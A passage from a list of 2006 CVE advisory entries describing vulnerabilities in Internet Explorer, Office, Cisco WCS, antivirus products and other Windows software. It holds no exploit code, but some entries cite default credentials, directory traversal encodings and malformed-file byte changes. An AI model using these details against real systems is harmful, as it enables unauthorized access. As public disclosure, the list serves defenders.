to CVE via e-mail that this is different than the other Excel vulnerabilities announced before 20060707, including CVE-2006-3059 and CVE-2006-3086. [CVE-2006-3427] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (crash) by declaring the sourceURL attribute on an uninitialized DirectAnimation.StructuredGraphicsControl ActiveX Object, which triggers a null dereference. [CVE-2006-3357] Heap-based buffer overflow in HTML Help ActiveX control (hhctrl.ocx) in Microsoft Internet Explorer 6.0 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code by repeatedly setting the Image field of an Internet.HHCtrl.1 object to certain values, possibly related to improper escaping and long strings. [CVE-2006-3354] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (crash) by setting the Filter property of an ADODB.Recordset ActiveX object to certain values multiple times, which triggers a null dereference. [CVE-2006-3351] Buffer overflow in Windows Explorer (explorer.exe) on Windows XP and 2003 allows user-assisted attackers to cause a denial of service (repeated crash) and possibly execute arbitrary code via a .url file with an InternetShortcut tag containing a long URL and a large number of "file:" specifiers. [CVE-2006-3290] HTTP server in Cisco Wireless Control System (WCS) for Linux and Windows before 3.2(51) stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain usernames and directory paths via a direct URL request. [CVE-2006-3289] Cross-site scripting (XSS) vulnerability in the login page of the HTTP interface for the Cisco Wireless Control System (WCS) for Linux and Windows before 3.2(51) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving a "malicious URL". [CVE-2006-3288] Unspecified vulnerability in the TFTP server in Cisco Wireless Control System (WCS) for Linux and Windows before 3.2(51), when configured to use a directory path name that contains a space character, allows remote authenticated users to read and overwrite arbitrary files via unspecified vectors. [CVE-2006-3287] Cisco Wireless Control System (WCS) for Linux and Windows 4.0(1) and earlier uses a default administrator username "root" and password "public," which allows remote attackers to gain access (aka bug CSCse21391). [CVE-2006-3286] The internal database in Cisco Wireless Control System (WCS) for Linux and Windows before 3.2(63) stores a hard-coded username and password in plaintext within unspecified files, which allows remote authenticated users to access the database (aka bug CSCsd15951). [CVE-2006-3285] The internal database in Cisco Wireless Control System (WCS) for Linux and Windows before 3.2(51) uses an undocumented, hard-coded username and password, which allows remote authenticated users to read, and possibly modify, sensitive configuration data (aka bugs CSCsd15955). [CVE-2006-3281] Microsoft Internet Explorer 6.0 does not properly handle Drag and Drop events, which allows remote user-assisted attackers to execute arbitrary code via a link to an SMB file share with a filename that contains encoded ..\ (%2e%2e%5c) sequences and whose extension contains the CLSID Key identifier for HTML Applications (HTA), aka "Folder GUID Code Execution Vulnerability." NOTE: directory traversal sequences were used in the original exploit, although their role is not clear. [CVE-2006-3280] Cross-domain vulnerability in Microsoft Internet Explorer 6.0 allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object, aka "Redirect Cross-Domain Information Disclosure Vulnerability." [CVE-2006-3274] Directory traversal vulnerability in Webmin before 1.280, when run on Windows, allows remote attackers to read arbitrary files via \ (backslash) characters in the URL to certain directories under the web root, such as the image directory. [CVE-2006-3268] Unspecified vulnerability in the Windows Client API in Novell GroupWise 5.x through 7 might allow users to obtain "random programmatic access" to other email within the same post office. [CVE-2006-3250] Heap-based buffer overflow in Windows Live Messenger 8.0 allows user-assisted attackers to execute arbitrary code via a crafted Contact List (.ctt) file, which triggers the overflow when it is imported by the user. [CVE-2006-3226] Cisco Secure Access Control Server (ACS) 4.x for Windows uses the client's IP address and the server's port number to grant access to an HTTP server port for an administration session, which allows remote attackers to bypass authentication via various methods, aka "ACS Weak Session Management Vulnerability." [CVE-2006-3146] The TOSRFBD.SYS driver for Toshiba Bluetooth Stack 4.00.29 and earlier on Windows allows remote attackers to cause a denial of service (reboot) via a L2CAP echo request that triggers an out-of-bounds memory access, similar to "Ping o' Death" and as demonstrated by BlueSmack. NOTE: this issue was originally reported for 4.00.23. [CVE-2006-3086] Stack-based buffer overflow in the HrShellOpenWithMonikerDisplayName function in Microsoft Hyperlink Object Library (hlink.dll) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long hyperlink, as demonstrated using an Excel worksheet with a long link in Unicode, aka "Hyperlink COM Object Buffer Overflow Vulnerability." NOTE: this is a different issue than CVE-2006-3059. [CVE-2006-3074] klif.sys in Kaspersky Internet Security 6.0 and 7.0, Kaspersky Anti-Virus (KAV) 6.0 and 7.0, KAV 6.0 for Windows Workstations, and KAV 6.0 for Windows Servers does not validate certain parameters to the (1) NtCreateKey, (2) NtCreateProcess, (3) NtCreateProcessEx, (4) NtCreateSection, (5) NtCreateSymbolicLinkObject, (6) NtCreateThread, (7) NtDeleteValueKey, (8) NtLoadKey2, (9) NtOpenKey, (10) NtOpenProcess, (11) NtOpenSection, and (12) NtQueryValueKey hooked system calls, which allows local users to cause a denial of service (reboot) via an invalid parameter, as demonstrated by the ClientId parameter to NtOpenProcess. [CVE-2006-3059] Unspecified vulnerability in Microsoft Excel 2000 through 2004 allows remote user-assisted attackers to execute arbitrary code via unspecified vectors. NOTE: this is a different vulnerability than CVE-2006-3086. [CVE-2006-3014] Microsoft Excel allows user-assisted attackers to execute arbitrary javascript and redirect users to arbitrary sites via an Excel spreadsheet with an embedded Shockwave Flash Player ActiveX Object, which is automatically executed when the user opens the spreadsheet. [CVE-2006-2919] Unspecified vulnerability in Microsoft NetMeeting 3.01 allows remote attackers to cause a denial of service (crash or CPU consumption) and possibly execute arbitrary code via crafted inputs that trigger memory corruption. [CVE-2006-2856] ActiveState ActivePerl 5.8.8.817 for Windows configures the site/lib directory with "Users" group permissions for changing files, which allows local users to gain privileges by creating a malicious sitecustomize.pl file in that directory. NOTE: The provenance of this information is unknown [CVE-2006-2838] Buffer overflow in the web console in F-Secure Anti-Virus for Microsoft Exchange 6.40, and Internet Gatekeeper 6.40 through 6.42 and 6.50 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown attack vectors. NOTE: By default, the connections are only allowed from the local host. [CVE-2006-2719] JIWA Financials 6.4.14 stores usernames and passwords for all accounts in cleartext in the HR_Staff table in Microsoft SQL Server, and sends the usernames and passwords in cleartext to the application's SQL Server ODBC driver, which might allow context-dependent attackers to obtain the passwords. [CVE-2006-2718] JIWA Financials 6.4.14 passes a Microsoft SQL Server account's username and password, and the name of a data source, to a Crystal Reports .rpt file, which allows remote authenticated users to execute certain standard stored procedures by referencing them in a user-written .rpt file, as demonstrated by using a stored procedure that provides the username and cleartext password of every account. [CVE-2006-2679] Unspecified vulnerability in the VPN Client for Windows Graphical User Interface (GUI) (aka the VPN client dialer) in Cisco VPN Client for Windows 4.8.00.* and earlier, except for 4.7.00.0533, allows local authenticated, interactive users to gain privileges, possibly due to privileges of dialog boxes, aka bug ID CSCsd79265. [CVE-2006-2612] Novell Client for Windows 4.8 and 4.9 does not restrict access to the clipboard contents while a machine is locked, which allows users with physical access to read the current clipboard contents by pasting them into the "User Name" field on the login prompt. [CVE-2006-2492] Buffer overflow in Microsoft Word in Office 2000 SP3, Office XP SP3, Office 2003 Sp1 and SP2, and Microsoft Works Suites through 2006, allows user-assisted attackers to execute arbitrary code via a malformed object pointer, as originally reported by ISC on 20060519 for a zero-day attack. [CVE-2006-2389] Unspecified vulnerability in Microsoft Office 2003 SP1 and SP2, Office XP SP3, Office 2000 SP3, and other products, allows user-assisted attackers to execute arbitrary code via an Office file with a malformed property that triggers memory corruption related to record lengths, aka "Microsoft Office Property Vulnerability," a different vulnerability than CVE-2006-1316. [CVE-2006-2388] Microsoft Office Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via malformed cell comments, which lead to modification of "critical data offsets" during the rebuilding process. [CVE-2006-2387] Unspecified vulnerability in Microsoft Excel 2000, 2002, 2003, 2004 for Mac, v.X for Mac, Excel Viewer 2003, and Microsoft Works Suite 2004 through 2006 allows user-assisted attackers to execute arbitrary code via a crafted DATETIME record in an XLS file, a different vulnerability than CVE-2006-3867 and CVE-2006-3875. [CVE-2006-2385] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4 and 6 SP1 and earlier allows user-assisted remote attackers to execute arbitrary code via a crafted web page that triggers memory corruption when it is saved as a multipart HTML (.mht) file. [CVE-2006-2384] Microsoft Internet Explorer 5.01 SP4 and 6 SP1 and earlier allows remote attackers to conduct spoofing and phishing attacks by using a modal browser window in a way that preserves the original address bar and trusted UI of a trusted site, even after the browser has been navigated to a malicious site, aka the "Address Bar Spoofing Vulnerability." [CVE-2006-2383] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4 and 6 SP1 and earlier allows remote attackers to execute arbitrary code via "unexpected data" related to "parameter validation" in the DXImageTransform.Microsoft.Light ActiveX control, which causes Internet Explorer to crash in a way that enables the code execution. [CVE-2006-2382] Heap-based buffer overflow in Microsoft Internet Explorer 5.01 SP4 and 6 SP1 and earlier allows remote attackers to execute arbitrary code via crafted UTF-8 encoded HTML that results in size discrepancies during conversion to Unicode, aka "HTML Decoding Memory Corruption Vulnerability." [CVE-2006-2312] Argument injection vulnerability in the URI handler in Skype 2.0..104 and 2.5..0 through 2.5..78 for Windows allows remote authorized attackers to download arbitrary files via a URL that contains certain command-line switches. [CVE-2006-2311] Cross-site scripting (XSS) vulnerability in BlueDragon Server and Server JX 6.2.1.286 for Windows allows remote attackers to inject arbitrary web script or HTML via the filename in a request to a (1) .cfm or (2) .cfml file, which reflects the result in the default error page. [CVE-2006-2310] BlueDragon Server and Server JX 6.2.1.286 for Windows allows remote attackers to cause a denial of service (hang) via a request for a .cfm file whose name contains an MS-DOS device name such as (1) con, (2) aux, (3) com1, and (4) com2. [CVE-2006-2297] Heap-based buffer overflow in Microsoft Infotech Storage System Library (itss.dll) allows user-assisted attackers to execute arbitrary code via a crafted CHM / ITS file that triggers the overflow while decompiling. [CVE-2006-2273] The InstallProduct routine in the Verisign VUpdater.Install (aka i-Nav) ActiveX control does not verify Microsoft Cabinet (.CAB) files, which allows remote attackers to run an arbitrary executable file. [CVE-2006-2197] Integer overflow in wv2 before 0.2.3 might allow context-dependent attackers to execute arbitrary code via a crafted Microsoft Word document. [CVE-2006-2155] EMC Retrospect for Windows 6.5 before 6.5.382, 7.0 before 7.0.344, and 7.5 before 7.5.1.105 allows local users to execute arbitrary code by replacing the Retrospect.exe file, possibly due to improper file permissions. [CVE-2006-2154] EMC Retrospect for Windows 6.5 before 6.5.382, 7.0 before 7.0.344, and 7.5 before 7.5.1.105 does not drop privileges before opening files, which allows local users to execute arbitrary code via the File>Open dialog. [CVE-2006-2111] A component in Microsoft Outlook Express 6 allows remote attackers to bypass domain restrictions and obtain sensitive information via redirections with the mhtml: URI handler, as originally reported for Internet Explorer 6 and 7, aka "URL Redirect Cross Domain Information Disclosure Vulnerability." [CVE-2006-2092] Unspecified vulnerability in HP StorageWorks Secure Path for Windows 4.0C-SP2 before 20060419 allows remote attackers to cause an unspecified denial of service via unknown vectors. [CVE-2006-2058] Argument injection vulnerability in Avant Browser 10.1 Build 17 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. [CVE-2006-2057] Argument injection vulnerability in Mozilla Firefox 1.0.6 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. [CVE-2006-2055] Argument injection vulnerability in Microsoft Outlook 2003 SP1 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. [CVE-2006-1992] mshtml.dll 6.00.2900.2873, as used in Microsoft Internet Explorer, allows remote attackers to cause a denial of service (crash) via nested OBJECT tags, which trigger invalid pointer dereferences including NULL dereferences. NOTE: the possibility of code execution was originally theorized, but Microsoft has stated that this issue is non-exploitable. [CVE-2006-1953] Directory traversal vulnerability in Caucho Resin 3.0.17 and 3.0.18 for Windows allows remote attackers to read arbitrary files via a "C:%5C" (encoded drive letter) in a URL. [CVE-2006-1952] Directory traversal vulnerability in WinAgents TFTP Server for Windows 3.1 and earlier allows remote attackers to read arbitrary files via "..." (triple dot) sequences in a GET request. [CVE-2006-1942] Mozilla Firefox 1.5.0.2 and possibly other versions before 1.5.0.4, Netscape 8.1, 8.0.4, and 7.2, and K-Meleon 0.9.13 allows user-assisted remote attackers to open local files via a web page with an IMG element containing a SRC attribute with a non-image file:// URL, then tricking the user into selecting View Image for the broken image, as demonstrated using a .wma file to launch Windows Media Player, or by referencing an "alternate web page." [CVE-2006-1934] Multiple buffer overflows in Ethereal 0.10.x up to 0.10.14 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the (1) ALCAP dissector, (2) Network Instruments file code, or (3) NetXray/Windows Sniffer file code. [CVE-2006-1774] HP System Management Homepage (SMH) 2.1.3.132, when running on CompaqHTTPServer/9.9 on Windows, Linux, or Tru64 UNIX, and when "Trust by Certificates" is not enabled, allows remote attackers to bypass authentication via a crafted URL. [CVE-2006-1725] Mozilla Firefox 1.5 before 1.5.0.2 and SeaMonkey before 1.0.1 causes certain windows to become translucent due to an interaction between XUL content windows and the history mechanism, which might allow user-assisted remote attackers to trick users into executing arbitrary code. [CVE-2006-1626] Internet Explorer 6 for Windows XP SP2 and earlier allows remote attackers to spoof the address bar and possibly conduct phishing attacks by re-opening the window to a malicious Shockwave Flash application, then changing the window location back to a trusted URL while the Flash application is still loading. NOTE: this is a different vulnerability than CVE-2006-1192. [CVE-2006-1540] MSO.DLL in Microsoft Office 2000, Office XP (2002), and Office 2003 allows user-assisted attackers to cause a denial of service and execute arbitrary code via multiple attack vectors, as originally demonstrated using a crafted document record with a malformed string, as demonstrated by replacing a certain "01 00 00 00" byte sequence with an "FF FF FF FF" byte sequence, possibly causing an invalid array index, in (1) an Excel .xls document, which triggers an access violation in ole32.dll [CVE-2006-1511] Buffer overflow in the ILASM assembler in the Microsoft .NET 1.0 and 1.1 Framework might allow user-assisted attackers to execute arbitrary code via a .il file that calls a function with a long name. [CVE-2006-1483] Blazix Web Server before 1.2.6, when running on Windows, allows remote attackers to obtain the source code of JSP files via (1) . (dot), (2) space, and (3) slash characters in the extension of a URL. [CVE-2006-1467] Integer overflow in the AAC file parsing code in Apple iTunes before 6.0.5 on Mac OS X 10.2.8 or later, and Windows XP and 2000, allows remote user-assisted attackers to execute arbitrary code via an AAC (M4P, M4A, or M4B) file with a sample table size (STSZ) atom with a "malformed" sample_size_table value. [CVE-2006-1394] Multiple cross-site scripting (XSS) vulnerabilities in the Microsoft IIS ISAPI filter (aka application server module) in University of Washington Pubcookie 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors. [CVE-2006-1388] Unspecified vulnerability in Microsoft Internet Explorer 6.0 allows remote attackers to execute HTA files via unknown vectors. [CVE-2006-1378] PasswordSafe 3.0 beta, when running on Windows before XP, uses a weak random number generator (C++ rand function) during generation of the database encryption key, which makes it easier for attackers to decrypt the database and steal passwords by generating keys for all possible rand() seed values and conducting a known plaintext attack. [CVE-2006-1364] Microsoft w3wp (aka w3wp.exe) does not properly handle when the AspCompat directive is not used when referencing COM components in ASP.NET, which allows remote attackers to cause a denial of service (resource consumption or crash) by repeatedly requesting each of several documents that refer to COM components, or are restricted documents located under the ASP.NET application path. [CVE-2006-1359] Microsoft Internet Explorer 6 and 7 Beta 2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a certain createTextRange call on a checkbox object, which results in a dereference of an invalid table pointer. [CVE-2006-1316] Unspecified vulnerability in Microsoft Office 2003 SP1 and SP2, Office XP SP3, Office 2000 SP3, and other products, allows user-assisted attackers to execute arbitrary code via an Office file with malformed string that triggers memory corruption related to record lengths, aka "Microsoft Office Parsing Vulnerability," a different vulnerability than CVE-2006-2389. [CVE-2006-1309] Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted LABEL record that triggers memory corruption. [CVE-2006-1308] Unspecified vulnerability in Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted FNGROUPCOUNT value. [CVE-2006-1306] Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted BIFF record with an attacker-controlled array index that is used for a function pointer, aka "Malformed OBJECT record Vulnerability." [CVE-2006-1305] Microsoft Outlook 2000, 2002, and 2003 allows user-assisted remote attackers to cause a denial of service (memory exhaustion and interrupted mail recovery) via malformed e-mail header information, possibly related to (1) long subject lines or (2) large numbers of recipients in To or CC headers. [CVE-2006-1304] Buffer overflow in Microsoft Excel 2000 through 2003 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted COLINFO record, which triggers the overflow during a "data filling operation." [CVE-2006-1303] Multiple unspecified vulnerabilities in Microsoft Internet Explorer 5.01 SP4 and 6 SP1 and earlier allow remote attackers to execute arbitrary code by instantiating certain COM objects from Wmm2fxa.dll as ActiveX controls including (1) DXImageTransform.Microsoft.MMSpecialEffect1Input, (2) DXImageTransform.Microsoft.MMSpecialEffect1Input.1, (3) DXImageTransform.Microsoft.MMSpecialEffect2Inputs, (4) DXImageTransform.Microsoft.MMSpecialEffect2Inputs.1, (5) DXImageTransform.Microsoft.MMSpecialEffectInplace1Input, and (6) DXImageTransform.Microsoft.MMSpecialEffectInplace1Input.1, which causes memory corruption during garbage collection. [CVE-2006-1302] Buffer overflow in Microsoft Excel 2000 through 2003 allows user-assisted attackers to execute arbitrary code via a .xls file with certain crafted fields in a SELECTION record, which triggers memory corruption, aka "Malformed SELECTION record Vulnerability." [CVE-2006-1301] Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted SELECTION record that triggers memory corruption, a different vulnerability than CVE-2006-1302. [CVE-2006-1298] Format string vulnerability in the Job Engine service (bengine.exe) in the Media Server in Veritas Backup Exec 10d (10.1) for Windows Servers rev. 5629, Backup Exec 10.0 for Windows Servers rev. 5520, Backup Exec 10.0 for Windows Servers rev. 5484, and Backup Exec 9.1 for Windows Servers rev. 4691, when the job log mode is Full Detailed (aka Full Details), allows remote authenticated users to cause a denial of service and possibly execute arbitrary code via a crafted filename on a machine that is backed up by Backup Exec. [CVE-2006-1297] Unspecified vulnerability in Veritas Backup Exec for Windows Server Remote Agent 9.1 through 10.1, for Netware Servers and Remote Agent 9.1 and 9.2, and Remote Agent for Linux Servers 10.0 and 10.1 allow attackers to cause a denial of service (application crash or unavailability) due to "memory errors." [CVE-2006-1257] The sample files in the authfiles directory in Microsoft Commerce Server 2002 before SP2 allow remote attackers to bypass authentication by logging in to authfiles/login.asp with a valid username and any password, then going to the main site twice. [CVE-2006-1245] Buffer overflow in mshtml.dll in Microsoft Internet Explorer 6.0.2900.2180, and probably other versions, allows remote attackers to execute arbitrary code via an HTML tag with a large number of script action handlers such as onload and onmouseover, as demonstrated using onclick, aka the "Multiple Event Handler Memory Corruption Vulnerability." [CVE-2006-1193] Cross-site scripting (XSS) vulnerability in Microsoft Exchange Server 2000 SP1 through SP3, when running Outlook Web Access (OWA), allows user-assisted remote attackers to inject arbitrary HTML or web script via unknown vectors related to "HTML parsing." [CVE-2006-1192] Microsoft Internet Explorer 5.01 through 6 allows remote attackers to conduct phishing attacks by spoofing the address bar and other parts of the trust UI via unknown methods that allow "window content to persist" after the user has navigated to another site, aka the "Address Bar Spoofing Vulnerability." NOTE: this is a different vulnerability than CVE-2006-1626. [CVE-2006-1191] Microsoft Internet Explorer 5.01 through 6 does not always correctly identify the domain that is associated with a browser window, which allows remote attackers to obtain sensitive cross-domain information and spoof sites by running script after the user has navigated to another site. [CVE-2006-1190] Microsoft Internet Explorer 5.01 through 6 does not always return the correct IOleClientSite information when dynamically creating an embedded object, which could cause Internet Explorer to run the object in the wrong security context or zone, and allow remote attackers to execute arbitrary code. [CVE-2006-1189] Buffer overflow in URLMON.DLL in Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via a crafted URL with an International Domain Name (IDN) using double-byte character sets (DBCS), aka the "Double Byte Character Parsing Memory Corruption Vulnerability." [CVE-2006-1188] Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via HTML elements with a certain crafted tag, which leads to memory corruption. [CVE-2006-1186] Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via by instantiating the (1) Mdt2gddr.dll, (2) Mdt2dd.dll, and (3) Mdt2gddo.dll COM objects as ActiveX controls, which leads to memory corruption. [CVE-2006-1185] Unspecified vulnerability in Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via certain invalid HTML that causes memory corruption. [CVE-2006-1166] Monotone 0.25 and earlier, when a user creates a file in a directory called "mt", and when checking out that file on a case-insensitive file system such as Windows or Mac OS X, places the file into the "MT" bookkeeping directory, which could allow context-dependent attackers to execute arbitrary Lua programs as the user running monotone. [CVE-2006-1161] Absolute path traversal vulnerability in Easy File Sharing (EFS) Web Server 3.2 allows remote registered users to execute arbitrary code by uploading a malicious file to the Windows startup folder. [CVE-2006-1043] Stack-based buffer overflow in Microsoft Visual Studio 6.0 and Microsoft Visual InterDev 6.0 allows user-assisted attackers to execute arbitrary code via a long DataProject field in a (1) Visual Studio Database Project File (.dbp) or (2) Visual Studio Solution (.sln). [CVE-2006-1023] Directory traversal vulnerability in HP System Management Homepage (SMH) 2.0.0 through 2.1.4 on Windows allows remote attackers to access certain files via unspecified vectors. [CVE-2006-1016] Buffer overflow in the IsComponentInstalled method in Internet Explorer 6.0, when used on Windows 2000 before SP4 or Windows XP before SP1, allows remote attackers to execute arbitrary code via JavaScript that calls IsComponentInstalled with a long first argument. [CVE-2006-1009] M4 Project enigma-suite before 0.73.3 (Windows) has a default password of "nominal" for the "enigma-client" account, which allows local users to gain access. [CVE-2006-0994] Multiple Sophos Anti-Virus products, including Anti-Virus for Windows 5.x before 5.2.1 and 4.x before 4.05, when cabinet file inspection is enabled, allows remote attackers to execute arbitrary code via a CAB file with "invalid folder count values," which leads to heap corruption. [CVE-2006-0991] Buffer overflow in the NetBackup Sharepoint Services server daemon (bpspsserver) on NetBackup 6.0 for Windows allows remote attackers to execute arbitrary code via crafted "Request Service" packets to the vnetd service (TCP port 13724). [CVE-2006-0935] Microsoft Word 2003 allows remote attackers to cause a denial of service (application crash) via a crafted file, as demonstrated by 101_filefuzz. [CVE-2006-0858] Unquoted Windows search path vulnerability in (1) snsmcon.exe, (2) the autostartup mechanism, and (3) an unspecified installation component in StarForce Safe'n'Sec Personal + Anti-Spyware 2.0 and earlier, and possibly other StarForce Safe'n'Sec products, might allow local users to gain privileges via a malicious "program" file in the C: folder. [CVE-2006-0818] Absolute path directory traversal vulnerability in (1) MERAK Mail Server for Windows 8.3.8r with before IceWarp Web Mail 5.6.1 and (2) VisNetic MailServer before 8.5.0.5 allows remote authenticated users to include arbitrary files via a modified language parameter and a full Windows or UNC pathname in the lang_settings parameter to mail/index.html, which is not properly sanitized by the validatefolder PHP function, possibly due to an incomplete fix for CVE-2005-4558. [CVE-2006-0817] Absolute path directory traversal vulnerability in (a) MERAK Mail Server for Windows 8.3.8r with before IceWarp Web Mail 5.6.1 and (b) VisNetic MailServer before 8.5.0.5 allows remote attackers to include arbitrary files via a full Windows path and drive letter in the (1) language parameter in accounts/inc/include.php and (2) lang_settings parameter in admin/inc/include.php, which is not properly sanitized by the securepath function, a related issue to CVE-2005-4556. [CVE-2006-0816] Orion Application Server before 2.0.7, when running on Windows, allows remote attackers to obtain the source code of JSP files via (1) . (dot) and (2) space characters in the extension of a URL. [CVE-2006-0814] response.c in Lighttpd 1.4.10 and possibly previous versions, when run on Windows, allows remote attackers to read arbitrary source code via requests that contain trailing (1) "." (dot) and (2) space characters, which are ignored by Windows, as demonstrated by PHP files. [CVE-2006-0799] Microsoft Internet Explorer allows remote attackers to spoof a legitimate URL in the status bar and conduct a phishing attack via a web page with an anchor element with a legitimate "href" attribute, a form whose action points to a malicious URL, and an INPUT submit element that is modified to look like a legitimate URL. NOTE: this issue is very similar to CVE-2004-1104, although the manipulations are slightly different. [CVE-2006-0773] Cross-site scripting (XSS) vulnerability in Hitachi Business Logic - Container 02-03 through 03-00-/B on Windows, and 03-00 through 03-00-/B on Linux, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in the extended receiving box function. [CVE-2006-0772] SQL injection vulnerability in Hitachi Business Logic - Container 02-03 through 03-00-/B on Windows, and 03-00 through 03-00-/B on Linux, allows remote attackers to execute arbitrary SQL commands via unspecified vectors in the extended receiving box function. [CVE-2006-0766] ICQ Inc. (formerly Mirabilis) ICQ 2003a, 2003b, Lite 4.0, Lite 4.1, and possibly other Windows versions allows user-assisted remote attackers to hide malicious file extensions and bypass Windows security warnings via a filename that ends in an assumed-safe extension such as JPG, and possibly containing other modified properties such as company name, icon, and description, which could trick a user into executing arbitrary programs. [CVE-2006-0765] GUI display truncation vulnerability in ICQ Inc. (formerly Mirabilis) ICQ 2003a, 2003b, Lite 4.0, Lite 4.1, and possibly other Windows versions allows user-assisted remote attackers to hide malicious file extensions, bypass Windows security warnings via a filename that is all uppercase and of a specific length, which truncates the malicious extension from the display and could trick a user into executing arbitrary programs. [CVE-2006-0761] Buffer overflow in BlackBerry Attachment Service in Research in Motion (RIM) BlackBerry Enterprise Server 2.2 and 4.0 before SP3 Hotfix 4 for IBM Lotus Domino, 3.6 before SP7 and 5.0 before SP3 Hotfix 3 for Microsoft Exchangem, and 4.0 for Novell GroupWise before SP3 Hotfix 1 might allow user-assisted remote attackers to execute arbitrary code on the server via a crafted Microsoft Word document that is opened on a wireless device. [CVE-2006-0705] Format string vulnerability in a logging function as used by various SFTP servers, including (1) AttachmateWRQ Reflection for Secure IT UNIX Server before 6.0.0.9, (2) Reflection for Secure IT Windows Server before 6.0 build 38, (3) F-Secure SSH Server for Windows before 5.3 build 35, (4) F-Secure SSH Server for UNIX 3.0 through 5.0.8, (5) SSH Tectia Server 4.3.6 and earlier and 4.4.0, and (6) SSH Shell Server 3.2.9 and earlier, allows remote authenticated users to execute arbitrary commands via unspecified vectors, involving crafted filenames and the stat command. [CVE-2006-0656] Directory traversal vulnerability in HP Systems Insight Manager 4.2 through 5.0 SP3 for Windows allows remote attackers to access arbitrary files via unspecified vectors, a different vulnerability than CVE-2005-2006. [CVE-2006-0611] Directory traversal vulnerability in compose.pl in @Mail 4.3 and earlier for Windows allows remote attackers to upload arbitrary files to arbitrary locations via a .. (dot dot) in the unique parameter. [CVE-2006-0585] jscript.dll in Microsoft Internet Explorer 6.0 SP1 and earlier allows remote attackers to cause a denial of service (application crash) via a Shockwave Flash object that contains ActionScript code that calls VBScript, which in turn calls the Javascript document.write function, which triggers a null dereference. [CVE-2006-0564] Stack-based buffer overflow in Microsoft HTML Help Workshop 4.74.8702.0, and possibly earlier versions, and as included in the Microsoft HTML Help 1.4 SDK, allows context-dependent attackers to execute arbitrary code via a .hhp file with a long Contents file field. [CVE-2006-0544] urlmon.dll in Microsoft Internet Explorer 7.0 beta 2 (aka 7.0.5296.0) allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a BGSOUND element with its SRC attribute set to "file://" followed by a large number of "-" (dash of hyphen) characters. [CVE-2006-0488] The VDM (Virtual DOS Machine) emulation environment for MS-DOS applications in Windows 2000, Windows XP SP2, and Windows Server 2003 allows local users to read the first megabyte of memory and possibly obtain sensitive information, as demonstrated by dumper.asm. [CVE-2006-0376] The 802.11 wireless client in certain operating systems including Windows 2000, Windows XP, and Windows Server 2003 does not warn the user when (1) it establishes an association with a station in ad hoc (aka peer-to-peer) mode or (2) a station in ad hoc mode establishes an association with it, which allows remote attackers to put unexpected wireless communication into place. [CVE-2006-0368] Cisco CallManager 3.2 and earlier, 3.3 before 3.3(5)SR1, 4.0 before 4.0(2a)SR2c, and 4.1 before 4.1(3)SR2 allow remote attackers to (1) cause a denial of service (CPU and memory consumption) via a large number of open TCP connections to port 2000 and (2) cause a denial of service (fill the Windows Service Manager communication queue) via a large number of TCP connections to port 2001, 2002, or 7727. [CVE-2006-0363] The "Remember my Password" feature in MSN Messenger 7.5 stores passwords in an encrypted format under the HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Creds registry key, which might allow local users to obtain the original passwords via a program that calls CryptUnprotectData, as demonstrated by the "MSN Password Recovery.exe" program. NOTE: it could be argued that local-only password recovery is inherently insecure because the decryption methods and keys must be stored somewhere on the local system, and are thus inherently accessible with varying degrees of effort. Perhaps this issue should not be included in CVE. [CVE-2006-0338] Multiple F-Secure Anti-Virus products and versions for Windows and Linux, including Anti-Virus for Windows Servers 5.52 and earlier, Internet Security 2004, 2005 and 2006, and Anti-Virus for Linux Servers 4.64 and earlier, allow remote attackers to hide arbitrary files and data via malformed (1) RAR and (2) ZIP archives, which are not properly scanned. [CVE-2006-0337] Buffer overflow in multiple F-Secure Anti-Virus products and versions for Windows and Linux, including Anti-Virus for Windows Servers 5.52 and earlier, Internet Security 2004, 2005 and 2006, and Anti-Virus for Linux Servers 4.64 and earlier, allows remote attackers to execute arbitrary code via crafted ZIP archives. [CVE-2006-0255] Unquoted Windows search path vulnerability in Check Point VPN-1 SecureClient might allow local users to gain privileges via a malicious "program.exe" file in the C: folder, which is run when SecureClient attempts to launch the Sr_GUI.exe program. [CVE-2006-0229] Unquoted Windows search path vulnerability in Wehntrust might allow local users to gain privileges via a malicious "program.exe" file in the C: folder, which is run when Wehntrust creates the autostart key. [CVE-2006-0187] By design, 